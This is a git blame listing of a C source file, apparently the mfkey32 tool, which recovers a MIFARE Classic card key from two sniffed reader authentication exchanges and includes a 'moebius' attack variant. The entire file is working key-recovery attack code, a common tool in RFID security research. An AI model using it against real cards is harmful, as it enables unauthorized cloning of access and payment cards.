]>
Commit | Line | Data |
---|---|---|
cda056bb | 1 | #include <inttypes.h> |
4cb4b588 | 2 | #include <stdbool.h> |
cda056bb | 3 | #include <stdio.h> |
4 | #include <stdlib.h> | |
4cb4b588 | 5 | #include "crapto1/crapto1.h" |
fdd9395d | 6 | #include "mifare/mfkey.h" |
ec9c7112 | 7 | #include "util_posix.h" |
8 | ||
cda056bb | 9 | |
4cb4b588 | 10 | // 32 bit recover key from 2 nonces |
cda056bb | 11 | int main (int argc, char *argv[]) { |
4cb4b588 | 12 | |
44964fd1 | 13 | nonces_t data = {0}; |
cda056bb | 14 | uint32_t ks2; // keystream used to encrypt reader response |
4cb4b588 | 15 | uint64_t key; // recovered key |
cda056bb | 16 | |
4cb4b588 | 17 | printf("MIFARE Classic key recovery - based on 32 bits of keystream\n"); |
cda056bb | 18 | printf("Recover key from two 32-bit reader authentication answers only!\n\n"); |
19 | ||
4cb4b588 | 20 | if (argc != 7 && argc != 8) { |
21 | printf(" syntax: %s <uid> <nt0> <{nr_0}> <{ar_0}> [<nt1>] <{nr_1}> <{ar_1}>\n", argv[0]); | |
22 | printf(" (you may omit nt1 if it is equal to nt0)\n\n"); | |
cda056bb | 23 | return 1; |
24 | } | |
25 | ||
4cb4b588 | 26 | bool moebius_attack = (argc == 8); |
27 | ||
28 | sscanf(argv[1],"%x",&data.cuid); | |
29 | sscanf(argv[2],"%x",&data.nonce); | |
30 | data.nonce2 = data.nonce; | |
31 | sscanf(argv[3],"%x",&data.nr); | |
32 | sscanf(argv[4],"%x",&data.ar); | |
33 | if (moebius_attack) { | |
34 | sscanf(argv[5],"%x",&data.nonce2); | |
35 | sscanf(argv[6],"%x",&data.nr2); | |
36 | sscanf(argv[7],"%x",&data.ar2); | |
37 | } else { | |
38 | sscanf(argv[5],"%x",&data.nr2); | |
39 | sscanf(argv[6],"%x",&data.ar2); | |
40 | } | |
cda056bb | 41 | |
42 | printf("Recovering key for:\n"); | |
4cb4b588 | 43 | printf(" uid: %08x\n",data.cuid); |
44 | printf(" nt0: %08x\n",data.nonce); | |
45 | printf(" {nr_0}: %08x\n",data.nr); | |
46 | printf(" {ar_0}: %08x\n",data.ar); | |
47 | printf(" nt1: %08x\n",data.nonce2); | |
48 | printf(" {nr_1}: %08x\n",data.nr2); | |
49 | printf(" {ar_1}: %08x\n",data.ar2); | |
cda056bb | 50 | |
4cb4b588 | 51 | uint64_t start_time = msclock(); |
52 | ||
cda056bb | 53 | // Generate lfsr succesors of the tag challenge |
54 | printf("\nLFSR succesors of the tag challenge:\n"); | |
4cb4b588 | 55 | printf(" nt': %08x\n",prng_successor(data.nonce, 64)); |
56 | printf(" nt'': %08x\n",prng_successor(data.nonce, 96)); | |
cda056bb | 57 | |
58 | // Extract the keystream from the messages | |
59 | printf("\nKeystream used to generate {ar} and {at}:\n"); | |
4cb4b588 | 60 | ks2 = data.ar ^ prng_successor(data.nonce, 64); |
cda056bb | 61 | printf(" ks2: %08x\n",ks2); |
62 | ||
4cb4b588 | 63 | bool success; |
64 | if (moebius_attack) { | |
65 | success = mfkey32_moebius(data, &key); | |
66 | } else { | |
67 | success = mfkey32(data, &key); | |
68 | } | |
69 | ||
70 | if (success) { | |
71 | printf("Recovered key: %012" PRIx64 "\n", key); | |
72 | } else { | |
73 | printf("Couldn't recover key.\n"); | |
cda056bb | 74 | } |
cda056bb | 75 | |
4cb4b588 | 76 | printf("Time spent: %1.2f seconds\n", (float)(msclock() - start_time)/1000.0); |
cda056bb | 77 | } |